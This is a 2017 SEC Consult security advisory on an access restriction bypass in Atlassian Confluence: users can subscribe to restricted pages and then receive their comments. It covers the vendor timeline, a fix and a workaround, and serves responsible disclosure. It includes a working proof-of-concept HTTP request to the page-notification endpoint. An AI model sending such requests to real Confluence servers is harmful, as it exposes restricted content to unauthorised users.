SEC Consult Vulnerability Lab Security Advisory < 20170613-0 >
=======================================================================
              title: Access Restriction Bypass
            product: Atlassian Confluence
 vulnerable version: 4.3.0 - 6.1.1
      fixed version: 6.2.1
         CVE number: -
             impact: Medium
           homepage: https://www.atlassian.com/
              found: 2017-03-27
                 by: Mathias Frank (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"In 2002, our founders, Scott Farquhar and Mike Cannon-Brookes, set
conventional wisdom on its ear by launching a successful enterprise
software company with no sales force. From Australia. Our first product, JIRA,
proved that if you make a great piece of software, price it right, and make
it available to anyone to download from the internet, teams will come. And
they'll build great things with it. And they'll tell two friends, and so on,
and so on.
Today a lot has changed. We're over 1,700 Atlassians (and growing), in six
locations, with products to help all types of teams realize their visions and
get stuff done. But the fundamentals remain the same. We're for teams because
we believe that great teams can do amazing things. We're not afraid to do
things differently. And we're driven by an inspiring set of values that shape
our culture and our products for the better."

Source: https://www.atlassian.com/company


Business recommendation:
------------------------
SEC Consult recommends to upgrade to the latest version available which fixes
the identified issue.


Vulnerability overview/description:
-----------------------------------
1) Access Restriction Bypass
The "watch" functionality provides a user the option to subscribe to specific
content. Furthermore, the user gets a notification for any new comment made to the
previously subscribed content.

A user can manually subscribe to pages which he is not able to view and he then
receives any further comment made on the restricted page.


Proof of concept:
-----------------
1) Access Restriction Bypass
Prerequisite as admin user just for a proof of concept demo page:
* Create a Space "Demo Space" visible for every user and group
* Create a Page "Demo Page" (example pageID: 1048582) and restrict the
  "Viewing and editing restriction" to only the administrator group/user with
  the "/pages/getcontentpermissions.action" function.


Send the following request as user:
------------------------------------------------------------------------------
POST /users/addpagenotificationajax.action HTTP/1.1
Host: localhost:8090
Referer: http://localhost:8090/display/ds/Welcome+to+Confluence
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

pageId=1048582&atl_token=1b5ee6615c44e4067679ccfa6e5904f0e42e8eb7
------------------------------------------------------------------------------

Then the user is subscribed to the "Demo Page" and receives a notification and is
able to receive any further comments made on the subscribed page.


Vulnerable / tested versions:
-----------------------------
The following version has been tested by SEC Consult
Atlassian Confluence version 5.9.14 and 6.1.1

Atlassian believes that versions beginning from 4.3.0 before 6.2.1 are affected.


Vendor contact timeline:
------------------------
2017-04-03: Contacting vendor through security@atlassian.com
2017-04-05: Vendor confirmed the vulnerability and issued the references
            CONFSERVER-52241 (Confluence Server) and CONFCLOUD-54634 (Confluence
            Cloud)
2017-04-13: Vendor fixed the issue CONFCLOUD-54634.
2017-05-11: Asked for planned timeline and release of an fix for CONFSERVER-52241.
2017-05-29: Vendor released a fix for CONFSERVER-52241 with version 6.2.1.
2017-06-08: Vendor prepares a sanitised copy of CONFSERVER-52241 for release along
            with the advisory - https://jira.atlassian.com/browse/CONFSERVER-52560
2017-06-13: Public release of advisory.


Solution:
---------
Upgrade to version 6.2.1 available at:
https://www.atlassian.com/software/confluence/download
The effectiveness of the fix was verified by the SEC Consult Vulnerability Lab.

https://jira.atlassian.com/browse/CONFSERVER-52560


Workaround:
-----------
Disable workbox notifications as per the instructions found at
https://confluence.atlassian.com/doc/configuring-workbox-notifications-301663830.html


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Mathias Frank / @2017